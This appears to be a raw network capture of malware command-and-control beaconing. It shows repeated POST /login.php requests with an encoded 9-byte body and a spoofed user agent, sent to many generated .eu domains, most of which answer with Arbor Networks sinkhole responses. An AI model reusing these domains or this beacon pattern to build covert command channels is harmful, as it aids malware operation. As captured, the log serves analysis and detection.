Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=02bb14d6e58270369a0be2635e2f3edd; Expires=Sun, 03 Sep 2023 05:30:42 GMT
Date: Sun, 04 Sep 2016 05:30:42 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2016 05:30:33 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.....
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekenilacap.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2016 05:30:33 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 287
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Sun, 04 Sep 2016 05:30:33 GMT..Server: Apache/2.2.22 (Debian)..Vary: Accept-Encoding..Content-Length: 287..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.<hr>.<address>Apache/2.2.22 (Debian) Server at qekenilacap.eu Port 80</address>.</body></html>...
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puregivytoh.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:42 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocakemenir.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=ce7ab289f22cebe2321038bc925a787f; Expires=Sun, 03 Sep 2023 05:29:48 GMT
Date: Sun, 04 Sep 2016 05:29:48 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qekikyvutic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:43 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cihunemyror.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:44 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:54 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:49 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: foxivusozuc.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:53 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:56 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tufecagemyl.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryhuzilywax.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:33 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:17 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xukovoruput.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
